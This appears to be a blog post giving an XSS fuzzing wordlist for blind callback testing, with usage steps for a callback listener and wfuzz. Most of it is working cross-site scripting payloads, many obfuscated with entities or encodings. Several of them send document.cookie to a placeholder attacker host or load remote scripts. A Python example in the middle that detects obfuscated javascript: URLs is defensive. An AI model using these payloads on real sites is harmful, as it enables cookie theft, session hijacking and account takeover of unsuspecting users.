intro

XSS fuzzing can get tricky, especially when the payload has to be sent to the backend in a POST request and you then have to wait for a user or bot to trigger it. The wordlists in well-known repositories such as PayloadsAllTheThings and SecLists do not really focus on XSS payloads that trigger a callback. This study introduces some payloads and techniques aimed specifically at this matter.

payloads with callbacks

<script>document.location="http://ip.address/xss-76.js?c="+document.cookie;</script>
<img src=x onerror=document.location="http://ip.address/xss-75.js?c="+document.cookie>
<SCRIPT>window.location.replace('http://ip.address/XSS-1');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ip.address/xss-2.js></SCRIPT>
<IMG SRC="javascript:window.location.replace('http://ip.address/XSS-3');">
<IMG SRC=javascript:window.location.replace('http://ip.address/XSS-4')>
<IMG SRC=JaVaScRiPt:window.location.replace('http://ip.address/XSS-5')>
<IMG SRC=javascript:window.location.replace(&quot;http://ip.address/XSS-6&quot;)>
<IMG SRC=`javascript:window.location.replace('http://ip.address/XSS-7')`>
<IMG SRC=javascript:eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,53,54,46,49,48,54,47,88,83,83,45,57,39,41))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:window.location.replace('http://ip.address/XSS-13');">
<IMG SRC="jav&#x09;ascript:window.location.replace('http://ip.address/XSS-14');">
<IMG SRC="jav&#x0A;ascript:window.location.replace('http://ip.address/XSS-15');">
<IMG SRC="jav&#x0D;ascript:window.location.replace('http://ip.address/XSS-16');">
<IMG SRC=" &#14;  javascript:window.location.replace('http://ip.address/XSS-17');">
<img src=x onerror=fetch('http://ip.address/'+document.cookie);>
<SCRIPT/XSS SRC="http://ip.address/xss-18.js"></SCRIPT>
<SCRIPT SRC=http://ip.address/xss-19.js?<B>
<IMG SRC="javascript:window.location.replace('http://ip.address/XSS-20')"
<SCRIPT>a=/XSS/
\";window.location.replace('http://ip.address/XSS-22');//
<INPUT TYPE="IMAGE" SRC="javascript:window.location.replace('http://ip.address/XSS-23');">
<BODY BACKGROUND="javascript:window.location.replace('http://ip.address/XSS-24')">
<BODY ONLOAD=window.location.replace('http://ip.address/XSS-25')>
<IMG DYNSRC="javascript:window.location.replace('http://ip.address/XSS-26')">
<IMG LOWSRC="javascript:window.location.replace('http://ip.address/XSS-27')">
<BGSOUND SRC="javascript:window.location.replace('http://ip.address/XSS-28');">
<BR SIZE="&{window.location.replace('http://ip.address/XSS-29')}">
<LAYER SRC="http://ip.address/scriptlet-30.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:window.location.replace('http://ip.address/XSS-31');">
<LINK REL="stylesheet" HREF="http://ip.address/xss-32.css">
<STYLE>@import'http://ip.address/xss-33.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ip.address/xss-34.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ip.address/xssmoz-35.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:window.location.replace('http://ip.address/XSS-38');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cDovLzEwLjEwLjE2LjQwL1hTUy00MCcpOzwvc2NyaVB0Pg==">
<META HTTP-EQUIV="Link" Content="<javascript:window.location.replace('http://ip.address/XSS-41')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:window.location.replace('http://ip.address/XSS-42');">
<IFRAME SRC="javascript:window.location.replace('http://ip.address/XSS-43');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:window.location.replace('http://ip.address/XSS-44');"></FRAMESET>
<TABLE BACKGROUND="javascript:window.location.replace('http://ip.address/XSS-45')">
<DIV STYLE="background-image: url(javascript:window.location.replace('http://ip.address/XSS-46'))">
<DIV STYLE="background-image: url(&#1;javascript:window.location.replace('http://ip.address/XSS-47'))">
<DIV STYLE="width: expression(window.location.replace('http://ip.address/XSS-48'));">
<STYLE>@im\port'\ja\vasc\ript:window.location.replace("http://ip.address/XSS-49")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(window.location.replace('http://ip.address/XSS-50'))">
<XSS STYLE="xss:expression(window.location.replace('http://ip.address/XSS-51'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">window.location.replace('http://ip.address/XSS-53');</STYLE>
<STYLE>.XSS{background-image:url(javascript:window.location.replace('http://ip.address/XSS-54'));}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url(javascript:window.location.replace('http://ip.address/XSS-55'))}</STYLE>
<BASE HREF="javascript:window.location.replace('http://ip.address/XSS-56');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ip.address/scriptlet-57.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:window.location.replace('http://ip.address/XSS-58')></OBJECT>
getURL("javascript:window.location.replace('http://ip.address/XSS-59')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:window.location.replace('http://ip.address/XSS-61');">
<XML SRC="http://ip.address/xsstest-62.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ip.address/xss-64.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ip.address/xss-65.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;window.location.replace('http://ip.address/XSS-67')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-window.location.replace('http://ip.address/XSS-68');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ip.address/xss-69.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ip.address/xss-70.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ip.address/xss-71.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ip.address/xss-72.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ip.address/xss-73.js"></SCRIPT>
<img src=x onerror=this.src="http://ip.address/xss-74.js?c="+document.cookie>
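Many entries in the list above differ from a plain `javascript:` URL only before decoding: decimal, zero-padded and hex entities (the `&#106;`, `&#0000106` and `&#x6A` entries) and tab, newline or carriage-return characters split into the scheme (the `jav&#x09;ascript` family). They are written to slip past filters that match the raw string. The following Python is an added example, not part of this page's wordlist, showing the normalize-then-match check a defender can apply to URL-bearing attributes: it decodes entities the way a browser does, drops the control characters browsers ignore inside a scheme, and only then looks at the scheme. The function names, the regular expressions and the sample fragments are constructed for this example; hosts use the page's `ip.address` placeholder.

```python
import html
import re

# Schemes in the list above whose URL body is handed to a script engine.
SCRIPT_SCHEMES = ("javascript", "vbscript", "livescript", "mocha")

# ASCII control characters. Browsers discard tab, LF and CR inside a URL scheme,
# which is why "jav&#x09;ascript:" still runs once the entity has been decoded.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# URL-bearing attributes the payloads above abuse, with the value in any of the
# four quoting styles that appear in the list: double, single, backtick, unquoted.
_URL_ATTR = re.compile(
    r"\b(?:src|href|data|background|dynsrc|lowsrc)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|`([^`]*)`|([^\s>]+))",
    re.I,
)


def normalize_url(value: str) -> str:
    """Undo what a browser undoes before resolving a URL attribute: HTML entities
    (named, decimal, zero-padded decimal, hex), then control characters, then
    surrounding whitespace."""
    decoded = value
    for _ in range(3):  # bounded loop: also unwraps double-encoded input, never spins
        again = html.unescape(decoded)
        if again == decoded:
            break
        decoded = again
    return _CONTROL_CHARS.sub("", decoded).strip()


def naive_is_script_url(value: str) -> bool:
    """The kind of check the obfuscated entries are built to evade:
    a prefix match on the raw, undecoded value."""
    return value.lower().startswith(tuple(s + ":" for s in SCRIPT_SCHEMES))


def is_script_url(value: str) -> bool:
    """True when the attribute value, after normalization, uses a script scheme."""
    scheme, sep, _rest = normalize_url(value).partition(":")
    return bool(sep) and scheme.strip().lower() in SCRIPT_SCHEMES


def find_script_urls(fragment: str) -> list:
    """Return the normalized value of every URL attribute in an HTML fragment that
    resolves to a script scheme. Event handlers (onerror=, onload=) and CSS
    expression()/url() payloads are different sinks and are not covered here."""
    hits = []
    for match in _URL_ATTR.finditer(fragment):
        raw = next(g for g in match.groups() if g is not None)
        if is_script_url(raw):
            hits.append(normalize_url(raw))
    return hits


if __name__ == "__main__":
    # Constructed samples in the style of the list above.
    samples = [
        '<IMG SRC="jav&#x09;ascript:window.location.replace(\'http://ip.address/XSS-14\');">',
        "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A"
        "&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
        "<SCRIPT SRC=http://ip.address/xss-2.js></SCRIPT>",
    ]
    for sample in samples:
        print(find_script_urls(sample) or "no script URL", "<-", sample[:60])
```

The order of operations is the point: decoding first and matching second is what makes the entity-encoded and whitespace-split entries collapse onto the same `javascript:` prefix that the naive check only recognises in its plain form. Plain spaces inside the scheme are deliberately kept, since the URL parser only strips tab, LF and CR. Entries that reach script through an event handler, `expression()` in CSS or a remote `.js` / `.css` file need a different check; for those, the listener side of this page (the unexpected outbound request to a host you do not own) is the signal to alert on.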

usage

  • Copy the above payloads and change the value of ip.address to fit your needs.
  • Set up an HTTP server that listens for the callbacks:
> python3 -m http.server 80
  • Conduct fuzzing as usual, using wfuzz or a similar tool:
> wfuzz -w xss.txt -u http://target.com -d 'param1=FUZZ'

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack